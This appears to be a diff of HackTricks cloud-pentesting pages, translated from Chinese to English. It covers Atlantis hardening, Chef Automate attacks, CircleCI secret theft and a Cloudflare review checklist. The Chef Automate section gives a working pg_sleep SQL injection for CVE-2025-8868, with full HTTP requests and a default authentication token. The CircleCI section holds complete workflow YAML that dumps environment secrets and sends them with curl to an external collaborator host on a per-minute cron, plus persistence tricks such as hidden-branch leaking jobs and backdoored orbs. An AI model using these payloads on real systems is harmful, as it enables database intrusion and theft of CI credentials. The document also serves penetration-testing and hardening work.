- 您的 GitHub 企业安装中的每个仓库:`--repo-allowlist=github.yourcompany.com/*`
- 所有仓库:`--repo-allowlist=*`。在受保护的网络中时很有用,但在没有设置 webhook 密钥的情况下是危险的。
- Specific repositories: `--repo-allowlist=github.com/runatlantis/atlantis,github.com/runatlantis/atlantis-tests`
- Your whole organization: `--repo-allowlist=github.com/runatlantis/*`
- Every repository in your GitHub Enterprise install: `--repo-allowlist=github.yourcompany.com/*`
- All repositories: `--repo-allowlist=*`. Useful for when you're in a protected network but dangerous without also setting a webhook secret.
此标志确保您的 Atlantis 安装不会与您不控制的仓库一起使用。有关更多详细信息,请参见 `atlantis server --help`
This flag ensures your Atlantis install isn't being used with repositories you don't control. See `atlantis server --help` for more details.
#### 保护 Terraform 计划 <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>
#### Protect Terraform Planning <a href="#protect-terraform-planning" id="protect-terraform-planning"></a>
如果攻击者提交带有恶意 Terraform 代码的拉取请求在您的威胁模型中,那么您必须意识到 `terraform apply` 批准是不够的。可以使用 [`external` 数据源](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) 或通过指定恶意提供程序在 `terraform plan` 中运行恶意代码。然后,这段代码可能会窃取您的凭据。
If attackers submitting pull requests with malicious Terraform code is in your threat model then you must be aware that `terraform apply` approvals are not enough. It is possible to run malicious code in a `terraform plan` using the [`external` data source](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data_source) or by specifying a malicious provider. This code could then exfiltrate your credentials.
为了防止这种情况,您可以:
To prevent this, you could:
1. 将提供程序打包到 Atlantis 镜像中或托管并在生产中拒绝出站。
2. 在内部实现提供程序注册协议并拒绝公共出站,这样您可以控制谁有写入注册表的权限。
3. 修改您的 [服务器端仓库配置](https://www.runatlantis.io/docs/server-side-repo-config.html) `plan` 步骤,以验证不允许的提供程序或数据源或不允许用户的 PR 的使用。您还可以在此时添加额外的验证,例如在允许 `plan` 继续之前要求 PR 上有“点赞”。Conftest 在这里可能会有用。
1. Bake providers into the Atlantis image or host and deny egress in production.
2. Implement the provider registry protocol internally and deny public egress, that way you control who has write access to the registry.
3. Modify your [server-side repo configuration](https://www.runatlantis.io/docs/server-side-repo-config.html)'s `plan` step to validate against the use of disallowed providers or data sources or PRs from not allowed users. You could also add in extra validation at this point, e.g. requiring a "thumbs-up" on the PR before allowing the `plan` to continue. Conftest could be of use here.
#### Webhook 密钥 <a href="#webhook-secrets" id="webhook-secrets"></a>
#### Webhook Secrets <a href="#webhook-secrets" id="webhook-secrets"></a>
Atlantis 应该通过 `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` 环境变量设置 webhook 密钥。即使设置了 `--repo-allowlist` 标志,如果没有 webhook 密钥,攻击者也可以伪装成允许列表中的仓库向 Atlantis 发出请求。Webhook 密钥确保 webhook 请求确实来自您的 VCS 提供商(GitHub GitLab)。
Atlantis should be run with Webhook secrets set via the `$ATLANTIS_GH_WEBHOOK_SECRET`/`$ATLANTIS_GITLAB_WEBHOOK_SECRET` environment variables. Even with the `--repo-allowlist` flag set, without a webhook secret, attackers could make requests to Atlantis posing as a repository that is allowlisted. Webhook secrets ensure that the webhook requests are actually coming from your VCS provider (GitHub or GitLab).
如果您使用 Azure DevOps请添加基本用户名和密码而不是 webhook 密钥。
If you are using Azure DevOps, instead of webhook secrets add a basic username and password.
#### Azure DevOps 基本身份验证 <a href="#azure-devops-basic-authentication" id="azure-devops-basic-authentication"></a>
#### Azure DevOps Basic Authentication <a href="#azure-devops-basic-authentication" id="azure-devops-basic-authentication"></a>
Azure DevOps 支持在所有 webhook 事件中发送基本身份验证头。这需要为您的 webhook 位置使用 HTTPS URL。
Azure DevOps supports sending a basic authentication header in all webhook events. This requires using an HTTPS URL for your webhook location.
#### SSL/HTTPS <a href="#ssl-https" id="ssl-https"></a>
如果您使用 webhook 密钥,但您的流量是通过 HTTP则 webhook 密钥可能会被窃取。使用 `--ssl-cert-file` `--ssl-key-file` 标志启用 SSL/HTTPS。
If you're using webhook secrets but your traffic is over HTTP then the webhook secrets could be stolen. Enable SSL/HTTPS using the `--ssl-cert-file` and `--ssl-key-file` flags.
#### Atlantis Web 服务器上启用身份验证 <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>
#### Enable Authentication on Atlantis Web Server <a href="#enable-authentication-on-atlantis-web-server" id="enable-authentication-on-atlantis-web-server"></a>
强烈建议在 Web 服务中启用身份验证。使用 `--web-basic-auth=true` 启用 BasicAuth并使用 `--web-username=yourUsername` `--web-password=yourPassword` 标志设置用户名和密码。
It is very recommended to enable authentication in the web service. Enable BasicAuth using the `--web-basic-auth=true` and setup a username and a password using `--web-username=yourUsername` and `--web-password=yourPassword` flags.
您还可以将这些作为环境变量传递 `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` `ATLANTIS_WEB_PASSWORD=yourPassword`
You can also pass these as environment variables `ATLANTIS_WEB_BASIC_AUTH=true` `ATLANTIS_WEB_USERNAME=yourUsername` and `ATLANTIS_WEB_PASSWORD=yourPassword`.
### 参考
### References
- [**https://www.runatlantis.io/docs**](https://www.runatlantis.io/docs)
- [**https://www.runatlantis.io/docs/provider-credentials.html**](https://www.runatlantis.io/docs/provider-credentials.html)
{{#include ../banners/hacktricks-training.md}}

View File

@@ -1,13 +1,13 @@
# Chef Automate 安全
# Chef Automate Security
{{#include ../../banners/hacktricks-training.md}}
## 什么是 Chef Automate
## What is Chef Automate
Chef Automate 是一个用于基础设施自动化、合规性和应用交付的平台。它暴露一个 web UI通常为 Angular通过 gRPC-Gateway 与后端 gRPC services 通信,提供类似 REST 的端点,路径例如 /api/v0/
Chef Automate is a platform for infrastructure automation, compliance, and application delivery. It exposes a web UI (often Angular) that talks to backend gRPC services via a gRPC-Gateway, providing REST-like endpoints under paths such as /api/v0/.
- 常见的后端组件: gRPC services, PostgreSQL (often visible via pq: error prefixes), data-collector ingest service
- 认证机制: user/API tokens and a data collector token header x-data-collector-token
- Common backend components: gRPC services, PostgreSQL (often visible via pq: error prefixes), data-collector ingest service
- Auth mechanisms: user/API tokens and a data collector token header x-data-collector-token
## Enumeration & Attacks
@@ -15,4 +15,4 @@ Chef Automate 是一个用于基础设施自动化、合规性和应用交付的
chef-automate-enumeration-and-attacks.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -4,37 +4,37 @@
## Overview
本页汇集了针对 Chef Automate 实例进行枚举和攻击的实用技术,重点包括:
- 发现 gRPC-Gateway-backed REST endpoints 并通过 validation/error responses 推断请求 schema
- 在存在默认值时滥用 x-data-collector-token 认证头
- 在 Compliance API 中的 Time-based blind SQL injectionCVE-2025-8868影响 /api/v0/compliance/profiles/search 中的 filters[].type 字段
This page collects practical techniques to enumerate and attack Chef Automate instances, with emphasis on:
- Discovering gRPC-Gateway-backed REST endpoints and inferring request schemas via validation/error responses
- Abusing the x-data-collector-token authentication header when defaults are present
- Time-based blind SQL injection in the Compliance API (CVE-2025-8868) affecting the filters[].type field in /api/v0/compliance/profiles/search
> Note: Backend responses that include header grpc-metadata-content-type: application/grpc typically indicate a gRPC-Gateway bridging REST calls to gRPC services.
## Recon: Architecture and Fingerprints
- Front-end: Often Angular。静态 bundle 可以提示 REST 路径(例如 /api/v0/...
- Front-end: Often Angular. Static bundles can hint at REST paths (e.g., /api/v0/...)
- API transport: REST to gRPC via gRPC-Gateway
- Responses may include grpc-metadata-content-type: application/grpc
- Responses may include grpc-metadata-content-type: application/grpc
- Database/driver fingerprints:
- Error bodies starting with pq: 强烈提示使用 PostgreSQL Go pq driver
- Error bodies starting with pq: strongly suggest PostgreSQL with the Go pq driver
- Interesting Compliance endpoints (auth required):
- POST /api/v0/compliance/profiles/search
- POST /api/v0/compliance/scanner/jobs/search
- POST /api/v0/compliance/profiles/search
- POST /api/v0/compliance/scanner/jobs/search
## Auth: Data Collector Token (x-data-collector-token)
Chef Automate 暴露了一个 data collector,通过专用头对请求进行认证:
Chef Automate exposes a data collector that authenticates requests via a dedicated header:
- Header: x-data-collector-token
- Risk: 某些环境可能保留默认 token从而获得对受保护 API 路由的访问权限。已在野外观察到的已知默认值:
- 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
- Risk: Some environments may retain a default token granting access to protected API routes. Known default observed in the wild:
- 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506
如果存在,该 token 可用于调用本应受 auth 限制的 Compliance API 端点。强化时务必尝试轮换/禁用默认值。
If present, this token can be used to call Compliance API endpoints otherwise gated by auth. Always attempt to rotate/disable defaults during hardening.
## API Schema Inference via Error-Driven Discovery
gRPC-Gateway-backed 端点经常 leak 有用的 validation 错误,这些错误会描述期望的请求模型。
gRPC-Gateway-backed endpoints often leak useful validation errors that describe the expected request model.
For /api/v0/compliance/profiles/search, the backend expects a body with a filters array, where each element is an object with:
@@ -42,36 +42,41 @@ For /api/v0/compliance/profiles/search, the backend expects a body with a filter
- values: array of strings
Example request shape:
```json
{
"filters": [
{ "type": "name", "values": ["test"] }
]
"filters": [
{ "type": "name", "values": ["test"] }
]
}
```
格式错误的 JSON 或字段类型不正确通常会触发带有提示的 4xx/5xx 响应,且响应头会显示 gRPC-Gateway 的行为。使用这些信息映射字段并定位注入面。
## 合规 API SQL Injection (CVE-2025-8868)
Malformed JSON or wrong field types typically trigger 4xx/5xx with hints, and headers indicate the gRPC-Gateway behavior. Use these to map fields and localize injection surfaces.
- 受影响的端点: POST /api/v0/compliance/profiles/search
- 注入点: filters[].type
- 漏洞类别: time-based blind SQL injection in PostgreSQL
- 根本原因: 在将 type 字段插入到动态 SQL 片段(可能用于构建 identifiers/WHERE clauses缺乏正确的 parameterization/whitelisting。type 中的构造值会被 PostgreSQL 评估。
## Compliance API SQL Injection (CVE-2025-8868)
- Affected endpoint: POST /api/v0/compliance/profiles/search
- Injection point: filters[].type
- Vulnerability class: time-based blind SQL injection in PostgreSQL
- Root cause: Lack of proper parameterization/whitelisting when interpolating the type field into a dynamic SQL fragment (likely used to construct identifiers/WHERE clauses). Crafted values in type are evaluated by PostgreSQL.
Working time-based payload:
有效的 time-based payload:
```json
{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
```
技术说明:
- 用单引号关闭原始字符串
- 连接一个调用 pg_sleep(N) 的子查询
- 通过 || 重新进入字符串上下文,以便无论 type 嵌入何处,最终的 SQL 都保持语法有效
### 通过差分延迟验证
Technique notes:
- Close the original string with a single quote
- Concatenate a subquery that calls pg_sleep(N)
- Re-enter string context via || so the final SQL remains syntactically valid regardless of where type is embedded
发送成对请求并比较响应时间以验证服务器端执行:
### Proof via differential latency
Send paired requests and compare response times to validate server-side execution:
- N = 1 second
- N = 1 秒
```
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
@@ -80,7 +85,9 @@ x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9
{"filters":[{"type":"name'||(SELECT pg_sleep(1))||'","values":["test"]}]}
```
- N = 5 秒
- N = 5 seconds
```
POST /api/v0/compliance/profiles/search HTTP/1.1
Host: <target>
@@ -89,11 +96,12 @@ x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9
{"filters":[{"type":"name'||(SELECT pg_sleep(5))||'","values":["test"]}]}
```
Observed behavior:
- Response times scale with pg_sleep(N)
- HTTP 500 responses may include pq: details during probing, confirming SQL execution paths
> Tip: 使用 timing validator(例如,多次试验并用统计比较)来减少噪声和误报。
> Tip: Use a timing validator (e.g., multiple trials with statistical comparison) to reduce noise and false positives.
### Impact
@@ -107,22 +115,22 @@ Authenticated users—or unauthenticated actors abusing a default x-data-collect
## Detection and Forensics
- API layer:
- Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes ('), concatenation (||), or function references like pg_sleep
- Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows
- Monitor 500s on /api/v0/compliance/profiles/search where filters[].type contains quotes ('), concatenation (||), or function references like pg_sleep
- Inspect response headers for grpc-metadata-content-type to identify gRPC-Gateway flows
- Database layer (PostgreSQL):
- Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver)
- Audit for pg_sleep calls and malformed identifier errors (often surfaced with pq: prefixes coming from the Go pq driver)
- Authentication:
- Log and alert on usage of x-data-collector-token, especially known default values, across API paths
- Log and alert on usage of x-data-collector-token, especially known default values, across API paths
## Mitigations and Hardening
- Immediate:
- Rotate/disable default data collector tokens
- Restrict ingress to data collector endpoints; enforce strong, unique tokens
- Rotate/disable default data collector tokens
- Restrict ingress to data collector endpoints; enforce strong, unique tokens
- Code-level:
- Parameterize queries; never string-concatenate SQL fragments
- Strictly whitelist allowed type values on the server (enum)
- Avoid dynamic SQL assembly for identifiers/clauses; if dynamic behavior is required, use safe identifier quoting and explicit whitelists
- Parameterize queries; never string-concatenate SQL fragments
- Strictly whitelist allowed type values on the server (enum)
- Avoid dynamic SQL assembly for identifiers/clauses; if dynamic behavior is required, use safe identifier quoting and explicit whitelists
## Practical Testing Checklist
@@ -139,4 +147,4 @@ Authenticated users—or unauthenticated actors abusing a default x-data-collect
- [gRPC-Gateway](https://github.com/grpc-ecosystem/grpc-gateway)
- [pq PostgreSQL driver for Go](https://github.com/lib/pq)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

View File

@@ -1,235 +1,258 @@
# CircleCI 安全
# CircleCI Security
{{#include ../banners/hacktricks-training.md}}
### 基本信息
### Basic Information
[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) 是一个持续集成平台,您可以在其中**定义模板**,指示您希望它对某些代码做什么以及何时执行。通过这种方式,您可以**自动化测试**或**部署**,例如直接**从您的代码库主分支**。
[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example.
### 权限
### Permissions
**CircleCI** **继承了**与登录的**账户**相关的githubbitbucket的权限。\
在我的测试中我检查到只要您在github上对代码库拥有**写权限**,您就能够**管理CircleCI中的项目设置**设置新的ssh密钥获取项目api密钥创建带有新CircleCI配置的新分支...)。
**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
然而,您需要成为**代码库管理员**才能**将代码库转换为CircleCI项目**。
However, you need to be a a **repo admin** in order to **convert the repo into a CircleCI project**.
### 环境变量和秘密
### Env Variables & Secrets
根据[**文档**](https://circleci.com/docs/2.0/env-vars/),有不同的方法可以**在工作流中加载环境变量的值**。
According to [**the docs**](https://circleci.com/docs/2.0/env-vars/) there are different ways to **load values in environment variables** inside a workflow.
#### 内置环境变量
#### Built-in env variables
每个由CircleCI运行的容器将始终具有[**文档中定义的特定环境变量**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables),如`CIRCLE_PR_USERNAME``CIRCLE_PROJECT_REPONAME``CIRCLE_USERNAME`
Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
#### 明文
#### Clear text
You can declare them in clear text inside a **command**:
您可以在**命令**中以明文声明它们:
```yaml
- run:
name: "set and echo"
command: |
SECRET="A secret"
echo $SECRET
name: "set and echo"
command: |
SECRET="A secret"
echo $SECRET
```
您可以在 **运行环境** 中以明文声明它们:
You can declare them in clear text inside the **run environment**:
```yaml
- run:
name: "set and echo"
command: echo $SECRET
environment:
SECRET: A secret
name: "set and echo"
command: echo $SECRET
environment:
SECRET: A secret
```
您可以在 **build-job environment** 中以明文声明它们:
```yaml
jobs:
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
```
您可以在 **容器的环境** 中以明文声明它们:
```yaml
jobs:
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
```
#### 项目秘密
这些是**秘密**,只有**项目**(通过**任何分支**)可以**访问**。\
您可以在 _https://app.circleci.com/settings/project/github/\<org_name>/\<repo_name>/environment-variables_ 中查看它们**声明**。
You can declare them in clear text inside the **build-job environment**:
```yaml
jobs:
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
```
You can declare them in clear text inside the **environment of a container**:
```yaml
jobs:
build-job:
docker:
- image: cimg/base:2020.01
environment:
SECRET: A secret
```
#### Project Secrets
These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
You can see them **declared in** _https://app.circleci.com/settings/project/github/\<org_name>/\<repo_name>/environment-variables_
![](<../images/image (129).png>)
> [!CAUTION]
> "**导入变量**" 功能允许从其他项目**导入变量**到这个项目。
> The "**Import Variables**" functionality allows to **import variables from other projects** to this one.
#### 上下文秘密
#### Context Secrets
这些是**组织范围**的秘密。默认情况下,**任何仓库**都可以**访问**存储在这里的任何秘密:
These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
![](<../images/image (123).png>)
> [!TIP]
> 但是,请注意,可以选择不同的组(而不是所有成员)**仅向特定人员提供访问秘密的权限**\
> 这目前是**提高秘密安全性**的最佳方法之一,不允许所有人访问,而只是一些人。
> However, note that a different group (instead of All members) can be **selected to only give access to the secrets to specific people**.\
> This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
### 攻击
### Attacks
#### 搜索明文秘密
#### Search Clear Text Secrets
如果您有**访问VCS**如github请检查**每个仓库每个分支**的文件 `.circleci/config.yml` 并**搜索**潜在的**明文秘密**。
If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
#### 秘密环境变量和上下文枚举
#### Secret Env Vars & Context enumeration
检查代码,您可以找到在每个 `.circleci/config.yml` 文件中**使用**的**所有秘密名称**。您还可以从这些文件中获取**上下文名称**,或在网络控制台中查看:_https://app.circleci.com/settings/organization/github/\<org_name>/contexts_
Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\<org_name>/contexts_.
#### 外泄项目秘密
#### Exfiltrate Project secrets
> [!WARNING]
> 为了**外泄所有**项目和上下文**秘密**,您**只需**对整个github组织中的**1个仓库**拥有**写入**权限_并且您的帐户必须有权访问上下文但默认情况下每个人都可以访问每个上下文_
> In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_).
> [!CAUTION]
> "**导入变量**" 功能允许从其他项目**导入变量**到这个项目。因此,攻击者可以**从所有仓库导入所有项目变量**,然后**一起外泄所有变量**
> The "**Import Variables**" functionality allows to **import variables from other projects** to this one. Therefore, an attacker could **import all the project variables from all the repos** and then **exfiltrate all of them together**.
All the project secrets always are set in the env of the jobs, so just calling env and obfuscating it in base64 will exfiltrate the secrets in the **workflows web log console**:
所有项目秘密始终在作业的环境中设置,因此只需调用 env 并将其混淆为 base64就会在**工作流网络日志控制台**中外泄秘密:
```yaml
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
workflows:
exfil-env-workflow:
jobs:
- exfil-env
exfil-env-workflow:
jobs:
- exfil-env
```
如果您**无法访问网络控制台**,但您有**对代码库的访问权限**并且知道使用了CircleCI您可以**创建一个工作流**,该工作流**每分钟触发一次**并且**将秘密导出到外部地址**
If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **create a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
```yaml
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
exfil-env-workflow:
triggers:
- schedule:
cron: "* * * * *"
filters:
branches:
only:
- circleci-project-setup
jobs:
- exfil-env
exfil-env-workflow:
triggers:
- schedule:
cron: "* * * * *"
filters:
branches:
only:
- circleci-project-setup
jobs:
- exfil-env
```
#### 提取上下文秘密
您需要**指定上下文名称**(这也将提取项目秘密):
#### Exfiltrate Context Secrets
You need to **specify the context name** (this will also exfiltrate the project secrets):
```yaml
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "env | base64"
workflows:
exfil-env-workflow:
jobs:
- exfil-env:
context: Test-Context
exfil-env-workflow:
jobs:
- exfil-env:
context: Test-Context
```
如果您**无法访问网络控制台**,但您有**对代码库的访问权限**并且知道使用了CircleCI您可以**修改一个每分钟触发的工作流**,并且该工作流**将秘密导出到外部地址**
If you **don't have access to the web console** but you have **access to the repo** and you know that CircleCI is used, you can just **modify a workflow** that is **triggered every minute** and that **exfils the secrets to an external address**:
```yaml
version: 2.1
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- run:
name: "Exfil env"
command: "curl https://lyn7hzchao276nyvooiekpjn9ef43t.burpcollaborator.net/?a=`env | base64 -w0`"
# I filter by the repo branch where this config.yaml file is located: circleci-project-setup
workflows:
exfil-env-workflow:
triggers:
- schedule:
cron: "* * * * *"
filters:
branches:
only:
- circleci-project-setup
jobs:
- exfil-env:
context: Test-Context
exfil-env-workflow:
triggers:
- schedule:
cron: "* * * * *"
filters:
branches:
only:
- circleci-project-setup
jobs:
- exfil-env:
context: Test-Context
```
> [!WARNING]
> 仅仅在一个仓库中创建一个新的 `.circleci/config.yml` **不足以触发 circleci 构建**。你需要在 **circleci 控制台中将其启用为项目**
> Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**.
#### 逃往云端
#### Escape to Cloud
**CircleCI** 让你可以选择在 **他们的机器上或你自己的机器上运行构建**\
默认情况下,他们的机器位于 GCP你最初无法找到任何相关信息。然而如果受害者在 **他们自己的机器上运行任务(可能是在云环境中)**,你可能会找到一个 **包含有趣信息的云元数据端点**
**CircleCI** gives you the option to run **your builds in their machines or in your own**.\
By default their machines are located in GCP, and you initially won't be able to fid anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
Notice that in the previous examples it was launched everything inside a docker container, but you can also **ask to launch a VM machine** (which may have different cloud permissions):
请注意,在之前的示例中,一切都是在 docker 容器内启动的,但你也可以 **请求启动一台虚拟机**(这可能具有不同的云权限):
```yaml
jobs:
exfil-env:
#docker:
# - image: cimg/base:stable
machine:
image: ubuntu-2004:current
exfil-env:
#docker:
# - image: cimg/base:stable
machine:
image: ubuntu-2004:current
```
或者甚至是一个可以访问远程 Docker 服务的 Docker 容器:
Or even a docker container with access to a remote docker service:
```yaml
jobs:
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- setup_remote_docker:
version: 19.03.13
exfil-env:
docker:
- image: cimg/base:stable
steps:
- checkout
- setup_remote_docker:
version: 19.03.13
```
#### 持久性
- 可以在 CircleCI 中 **创建** **用户令牌** 以使用用户访问权限访问 API 端点。
- _https://app.circleci.com/settings/user/tokens_
- 可以 **创建项目令牌** 以使用令牌授予的权限访问项目。
- _https://app.circleci.com/settings/project/github/\<org>/\<repo>/api_
- 可以 **向项目添加 SSH 密钥**
- _https://app.circleci.com/settings/project/github/\<org>/\<repo>/ssh_
- 可以在一个意外的项目中 **在隐藏分支中创建一个 cron 作业**,每天 **泄露** 所有 **上下文环境** 变量。
- 或者甚至在一个分支中创建/修改一个已知作业,每天 **泄露** 所有上下文和 **项目秘密**
- 如果你是 GitHub 的所有者,你可以 **允许未验证的 orbs** 并在作业中将其配置为 **后门**
- 你可以在某些任务中找到 **命令注入漏洞** 并通过 **秘密** 修改其值来 **注入命令**
#### Persistence
- It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access.
- _https://app.circleci.com/settings/user/tokens_
- It's possible to **create projects tokens** to access the project with the permissions given to the token.
- _https://app.circleci.com/settings/project/github/\<org>/\<repo>/api_
- It's possible to **add SSH keys** to the projects.
- _https://app.circleci.com/settings/project/github/\<org>/\<repo>/ssh_
- It's possible to **create a cron job in hidden branch** in an unexpected project that is **leaking** all the **context env** vars everyday.
- Or even create in a branch / modify a known job that will **leak** all context and **projects secrets** everyday.
- If you are a github owner you can **allow unverified orbs** and configure one in a job as **backdoor**
- You can find a **command injection vulnerability** in some task and **inject commands** via a **secret** modifying its value
{{#include ../banners/hacktricks-training.md}}

View File

@@ -1,14 +1,14 @@
# Cloudflare 安全
# Cloudflare Security
{{#include ../../banners/hacktricks-training.md}}
Cloudflare 帐户中,有一些可以配置的 **general settings and services**。在本页我们将对每个部分的 **安全相关设置** 进行 **分析:**
In a Cloudflare account there are some **general settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
<figure><img src="../../images/image (117).png" alt=""><figcaption></figcaption></figure>
## Websites
按以下内容逐项复查:
Review each with:
{{#ref}}
cloudflare-domains.md
@@ -16,9 +16,9 @@ cloudflare-domains.md
### Domain Registration
- [ ] **`Transfer Domains`** 中检查是否无法转移任何域名。
- [ ] In **`Transfer Domains`** check that it's not possible to transfer any domain.
按以下内容逐项复查:
Review each with:
{{#ref}}
cloudflare-domains.md
@@ -26,45 +26,39 @@ cloudflare-domains.md
## Analytics
_我找不到用于配置安全审查的具体检查项。_
_I couldn't find anything to check for a config security review._
## Pages
针对每个 Cloudflare Pages
On each Cloudflare's page:
- [ ] **`Build log`** 中检查是否包含 **敏感信息**
- [ ] 检查分配给 Pages 的 **Github repository** 中是否包含 **敏感信息**
- [ ] 检查通过 **workflow command injection** `pull_request_target` 被利用导致的潜在 github repo 被攻破风险。更多信息见 [**Github Security page**](../github-security/index.html)
- [ ] 检查 `/fuctions` 目录(如果存在)中的潜在 **vulnerable functions**,检查 `_redirects` 文件(如果存在)中的 **redirects**,以及 `_headers` 文件(如果存在)中的 **misconfigured headers**
- [ ] 如果可以 **访问代码**,通过 **blackbox** **whitebox** 检查 **web page****vulnerabilities**
- [ ] 在每个页面的详细信息 `/<page_id>/pages/view/blocklist/settings/functions` 中,检查 **`Environment variables`** 是否包含 **敏感信息**
- [ ] 在详情页还要检查 **build command** **root directory** 是否存在可被注入以攻陷页面的潜在风险。
- [ ] Check for **sensitive information** in the **`Build log`**.
- [ ] Check for **sensitive information** in the **Github repository** assigned to the pages.
- [ ] Check for potential github repo compromise via **workflow command injection** or `pull_request_target` compromise. More info in the [**Github Security page**](../github-security/index.html).
- [ ] Check for **vulnerable functions** in the `/fuctions` directory (if any), check the **redirects** in the `_redirects` file (if any) and **misconfigured headers** in the `_headers` file (if any).
- [ ] Check for **vulnerabilities** in the **web page** via **blackbox** or **whitebox** if you can **access the code**
- [ ] In the details of each page `/<page_id>/pages/view/blocklist/settings/functions`. Check for **sensitive information** in the **`Environment variables`**.
- [ ] In the details page check also the **build command** and **root directory** for **potential injections** to compromise the page.
## **Workers**
针对每个 Cloudflare Workers 检查:
On each Cloudflare's worker check:
- [ ] 触发机制:是什么触发 worker用户是否可以发送会被 worker 使用的数据?
- [ ] **`Settings`** 中,检查是否有包含 **敏感信息****`Variables`**。
- [ ] 检查 worker 的 **code**,在用户可控输入处搜索 **vulnerabilities**(尤其重要)。
- 检查返回可由你控制的指定页面的 SSRFs
- 检查在 svg 图片中执行 JS 的 XSSs
- worker 可能与其他内部服务交互。例如worker 可能将从输入获取的信息存入某个 R2 bucket。在这种情况下需要检查 worker 对该 R2 bucket 拥有什么权限,以及这些权限如何能被用户输入滥用。
- [ ] The triggers: What makes the worker trigger? Can a **user send data** that will be **used** by the worker?
- [ ] In the **`Settings`**, check for **`Variables`** containing **sensitive information**
- [ ] Check the **code of the worker** and search for **vulnerabilities** (specially in places where the user can manage the input)
- Check for SSRFs returning the indicated page that you can control
- Check XSSs executing JS inside a svg image
- It is possible that the worker interacts with other internal services. For example, a worker may interact with a R2 bucket storing information in it obtained from the input. In that case, it would be necessary to check what capabilities does the worker have over the R2 bucket and how could it be abused from the user input.
> [!WARNING]
> 注意默认情况下 **Worker 会被分配一个 URL**,例如 `<worker-name>.<account>.workers.dev`。用户可以将其设置为 **子域名**,但如果你知道该 **原始 URL**,仍然可以通过它访问。
关于将 Workers 作为透传代理IP rotation、FireProx 风格)实际滥用的示例,请参见:
{{#ref}}
cloudflare-workers-pass-through-proxy-ip-rotation.md
{{#endref}}
> Note that by default a **Worker is given a URL** such as `<worker-name>.<account>.workers.dev`. The user can set it to a **subdomain** but you can always access it with that **original URL** if you know it.
## R2
在每个 R2 bucket 上检查:
On each R2 bucket check:
- [ ] 配置 CORS 策略(CORS Policy)。
